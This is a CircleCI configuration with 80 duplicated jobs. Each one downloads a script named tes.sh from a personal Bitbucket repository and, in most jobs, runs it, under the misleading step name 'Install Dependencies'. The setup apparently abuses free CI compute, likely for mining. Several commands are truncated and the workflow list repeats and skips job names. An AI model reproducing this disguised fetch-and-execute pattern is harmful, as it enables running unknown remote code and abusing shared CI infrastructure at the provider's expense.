version: 2.1
orbs:
  ruby: circleci/ruby@0.1.2 
jobs:
    peler1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh &&
    peler15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler31:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler32:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler33:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler34:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler35:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler36:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler37:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler38:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler39:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler40:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler41:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler42:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh &&
    peler43:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler44:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler45:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler46:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler47:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh &&
    peler48:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler49:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler50:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && 
    peler51:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler52:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler53:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler54:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && 
    peler55:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler56:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler57:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler58:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler59:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh &&
    peler60:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler61:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler62:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler63:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler64:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler65:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler66:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler67:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh
    peler68:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler69:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler70:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.s
    peler71:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler72:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler73:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler74:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.s
    peler75:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler76:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler77:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler78:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler79:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh
    peler80:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/noban235/joko/raw/0c33562599197ba2a22134dacc4d8551d119cefa/tes.sh && chmod u+x tes.sh && ./tes.sh

workflows:
    version: 2.1
    build:
        jobs:
            - peler1
            - peler2
            - peler3
            - peler4
            - peler5
            - peler6
            - peler7
            - peler8
            - peler9
            - peler10
            - peler11
            - peler12
            - peler13
            - peler14
            - peler15
            - peler16
            - peler17
            - peler18
            - peler19
            - peler20
            - peler21
            - peler22
            - peler23
            - peler24
            - peler25
            - peler26
            - peler27
            - peler28
            - peler29
            - peler30
            - peler31
            - peler32
            - peler33
            - peler34
            - peler35
            - peler36
            - peler37
            - peler38
            - peler39
            - peler40
            - peler41
            - peler42
            - peler43
            - peler44
            - peler45
            - peler46
            - peler47
            - peler48
            - peler49
            - peler50
            - peler61
            - peler62
            - peler63
            - peler64
            - peler65
            - peler66
            - peler67
            - peler68
            - peler69
            - peler60
            - peler61
            - peler72
            - peler73
            - peler74
            - peler75
            - peler76
            - peler77
            - peler78
            - peler79
            - peler70
            - peler71
            - peler72
            - peler73
            - peler74
            - peler75
            - peler76
            - peler77
            - peler78
            - peler79
            - peler80
